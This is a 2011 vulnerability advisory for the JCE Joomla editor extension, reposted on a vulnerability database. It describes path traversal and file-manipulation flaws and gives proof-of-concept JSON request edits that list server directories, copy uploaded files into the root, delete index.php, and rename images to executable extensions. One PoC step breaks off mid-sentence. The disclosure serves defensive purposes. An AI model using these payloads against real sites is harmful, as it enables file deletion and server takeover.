Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26934
HistoryAug 30, 2011 - 12:00 a.m.

JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

2011-08-3000:00:00
vulners.com
241

########################## www.BugReport.ir
#######################################

AmnPardaz Security Research Team

Title: JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

Vendor: www.joomlacontenteditor.net

Exploit: Available

Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager

1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)

Impact: High

Original Advisory: http://www.bugreport.ir/index_78.htm

Fix: N/A

###################################################################################

####################

  1. Description:
    ####################

    JCE is an extension for Joomla!, that provides you with a set of
    wysiwyg editor tools that makes the job of writing articles for your
    Joomla! site a little bit easier.
    In a nutshell, it provides access to many of the features you may
    be used to using in Word or OpenOffice etc.

####################
2. Vulnerabilities:
####################

 2.1. Path Traversal Flaws. Path Traversal in &quot;Image Manager&quot;, 

"Media Manager", "Template Manager" and "File Manager" section.
2.1.1. Exploit:
Check the exploit/POC section.

 2.2. Path Manipulation Flaws. Path Manipulation in &quot;Image Manager&quot;, 

"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
2.2.1. Exploit:
Check the exploit/POC section.

 2.3. Unsafe function Flaws. Attackers can use unsafe function 

called "folderRename" for changing Image type extension (.jpg, .gif,
png & etc.) to any extension like .htaccess or .php in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
2.3.1. Exploit:
Check the exploit/POC section.

####################
3. Exploits/PoCs:
####################

Original Exploit URL: http://www.bugreport.ir/78/exploit.htm

 3.1. Path Traversal Flaws. Path Traversal in &quot;Image Manager&quot;, 

"Media Manager", "Template Manager" and "File Manager" section.
-------------
Path Traversal and see all directories:
Step 1 ±-> Click on root (left bar)
Step 2 ±-> Use Proxy (like burp) for changing path:

                 json={&quot;fn&quot;:&quot;getItems&quot;,&quot;args&quot;:[&quot;/&quot;,&quot;all&quot;,0,&quot;&quot;]}   
          to           

json={"fn":"getItems","args":["…/…/","all",0,""]}

     -------------

 3.2. Path Manipulation Flaws. Path Manipulation in &quot;Image Manager&quot;, 

"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
-------------
For uploading file:
Step 1 ±-> Upload a file with image type extension like azizi.jpg
Step 2 ±-> Click on root (left bar)
Step 3 ±-> Use Proxy (like burp) and change "json" parameter
to json={"fn":"fileCopy","args":["/azizi.jpg","…/…/"]}

     Now azizi.jpg copied to root directory.


     For deleting file:
     Step 1 +--&gt; Click on root &#40;left bar&#41;
     Step 2 +--&gt; Use Proxy &#40;like burp&#41; and change &quot;json&quot; parameter 

to json={"fn":"fileDelete","args":"…/…/index.php"}

     Now index.php has been deleted.
     -------------

 3.3. Unsafe function Flaws. Attackers can use unsafe function for 

changing Image type extension (.jpg, .gif, .png & etc.) to any extension
like .htaccess or .php in "Image Manager", "Media Manager", "Template
Manager" and "File Manager" section.
-------------
For uploading file with executable extension:
Step 1 ±-> Upload a file with image type extension like azizi.jpg
Step 2 ±-> Click on root (left bar)
Step 3 ±-> Use Proxy (like burp) and change "json" p

####################
4. Solution:
####################

 Restricting and granting only trusted users having access to 

resources and wait for vender patch.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com